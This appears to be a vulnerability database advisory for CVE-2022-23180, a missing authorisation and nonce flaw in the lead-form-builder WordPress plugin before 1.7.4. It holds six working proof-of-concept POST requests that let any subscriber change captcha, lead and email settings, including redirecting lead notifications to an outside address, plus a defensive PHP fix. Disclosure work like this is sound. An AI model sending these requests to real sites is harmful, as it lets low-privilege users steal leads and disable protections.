WordPress Plugin Vulnerabilities

Contact Form & Lead Form Elementor Builder Plugin < 1.7.4 - Multiple Subscriber+ Settings Update

Description

The plugin lacks authorisation and nonce checks, which could allow any authenticated user, such as a subscriber, to update and change various settings.

Proof of Concept

PoC POST Request (ON/OFF Captcha):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

captcha-on-off-setting=ON&captcha_on_off_form_id=2&action=SaveCaptchaOption


PoC POST Request (Captcha Settings: Site Key & Secret Key):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

captcha-setting-sitekey=YoruOni&captcha-setting-secret=YoruOni&captcha-keys=1&action=SaveCaptchaSettings


PoC POST Request (Lead Receiving Method):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

data-recieve-method=3&action-lead-setting=1&action=SaveLeadSettings


PoC POST Request (User Email Notifications):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

user_email_setting%5Bfrom%5D=yoruoni%40pm.me&user_email_setting%5Bheader%5D=New+Lead+Received&user_email_setting%5Bsubject%5D=Received+a+lead&user_email_setting%5Bmessage%5D=Form+Submitted+Successfully&user-email-setting-option=OFF&user_email_setting%5Bform-id%5D=1&action=SaveUserEmailSettings


PoC POST Request (Admin Email Notifications):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

email_setting%5Bto%5D=yoruoni%40pm.me&email_setting%5Bmultiple%5D=&email_setting%5Bfrom%5D=admin%40x14.tv&email_setting%5Bheader%5D=New+Lead+Received&email_setting%5Bsubject%5D=Form+Leads&email_setting%5Bmessage%5D=%5Blf-new-form-data%5D&email_setting%5Bform-id%5D=1&action=SaveEmailSettings


PoC POST Request (Remember this Form):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

form_id=1&action=RememberMeThisForm 
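
The checks whose absence the description reports, sketched for one of the actions above. This is an added example, not the plugin's code or its 1.7.4 patch: the action name and POST fields come from the first PoC request, while the function name, nonce action, option name, required capability and the ON/OFF allow-list are assumptions.

```php
<?php
// Added illustration, not the plugin's code. The AJAX action name
// SaveCaptchaOption and the POST field names come from the PoC request;
// the function name, nonce action, option name and capability are hypothetical.

add_action( 'wp_ajax_SaveCaptchaOption', 'example_save_captcha_option' );

function example_save_captcha_option() {
    // Authorisation: wp_ajax_* hooks fire for every logged-in user,
    // subscribers included, so the handler must check the capability itself.
    // Assumption: only administrators should change these settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // CSRF: require a nonce issued for this action, e.g. one created in the
    // settings page with wp_create_nonce( 'example_save_captcha_option' ).
    // With the third argument false, check_ajax_referer() returns false
    // instead of dying, so the handler can send its own error.
    if ( ! check_ajax_referer( 'example_save_captcha_option', '_wpnonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
    }

    // Validate input before storing it (the allow-list is an assumption).
    $state   = isset( $_POST['captcha-on-off-setting'] )
        ? sanitize_text_field( wp_unslash( $_POST['captcha-on-off-setting'] ) )
        : '';
    $form_id = isset( $_POST['captcha_on_off_form_id'] )
        ? absint( $_POST['captcha_on_off_form_id'] )
        : 0;

    if ( ! in_array( $state, array( 'ON', 'OFF' ), true ) || 0 === $form_id ) {
        wp_send_json_error( array( 'message' => 'Invalid input' ), 400 );
    }

    // Hypothetical option name; the real plugin's storage is not shown on this page.
    update_option( 'example_captcha_state_' . $form_id, $state );
    wp_send_json_success();
}
```

The same two checks apply to each of the other actions listed in the PoC requests, since every `wp_ajax_*` handler is reachable by any logged-in account.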

Affects Plugins

lead-form-builder
Fixed in version 1.7.4

References

CVE
CVE-2022-23180
URL
https://plugins.trac.wordpress.org/changeset/2670484

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Yoru Oni

Submitter

Yoru Oni

Submitter website
https://profiles.wordpress.org/yoruoni
Verified

Yes

WPVDB ID
da87358a-3a72-4cf7-a2af-a266dd9b4290

Timeline

Publicly Published

2022-02-01

Added

2022-02-01

Last Updated

2022-04-13
